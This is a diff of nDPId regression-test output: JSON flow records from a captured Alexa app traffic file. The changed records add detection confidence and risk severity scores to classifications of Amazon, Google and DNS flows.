+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976195633,"flow_last_seen":1490976195989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6582,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976090991,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5257,"flow_avg_l4_payload_len":194,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976100859,"flow_last_seen":1490976107676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5318,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976027733,"flow_last_seen":1490976027826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00755{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1490976196223,"flow_last_seen":1490976196880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24810,"flow_avg_l4_payload_len":400,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976024857,"flow_last_seen":1490976024994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976100859,"flow_last_seen":1490976107676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5318,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976027733,"flow_last_seen":1490976027826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00941{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1490976196223,"flow_last_seen":1490976196880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24810,"flow_avg_l4_payload_len":400,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976024857,"flow_last_seen":1490976024994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976082723,"flow_last_seen":1490976084872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5020,"flow_avg_l4_payload_len":251,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1490976090572,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12466,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976100811,"flow_last_seen":1490976107676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7423,"flow_avg_l4_payload_len":337,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
